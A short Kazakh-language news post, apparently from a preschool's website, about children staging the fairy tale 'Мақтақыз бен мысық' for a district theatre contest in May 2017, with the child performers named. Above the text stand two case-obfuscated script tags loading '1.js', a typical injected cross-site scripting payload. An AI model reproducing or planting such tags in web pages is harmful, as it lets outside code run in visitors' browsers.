<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.05.2017

3 мамыр күні "Атбасар ауданының білім бөлімі" ММ-нің жоспары негізінде шағын орталық қабырғаларында "Сказочный дождь" балалар театралдық ұжымдары арасындағы аудандық сайысқа арналған "Мақтақыз бен мысық" атты ертегісінің қойылымы қонақтар мен әділқазылар алқасына ұсынылды.

Ертегі қойылымына қатысқан кейіпкерлер: Қабдыхмет Інжу - Мақта қыз, Капышева Томирис - мысық, Зейнолда Нурасыл - сиыр, Амирова Аяжан - ағаш, Михалкина Анастасия және Оверина Софья - қыздар, Қошақанова Жайна - дүкенші, Нуртазина Снежана - тауық, Шайхин Жанат - тышқан. Қойылымды ұйымдастыруға белсенді қатысқан және балаларға кейіпкерлер бейнесін ашатын костюмдерін жасаған ата-аналарға алғысымызды білдіреміз. Тәрбиешілер ертегі ахуалын қалыптастырып көрермендердің көңілінен шыға білді. Сайыстың қорытындыларын зор үмітпен күтудеміз...

Просмотров: 1041


Пікір қосу



Деректерді қолтаңбаға қосу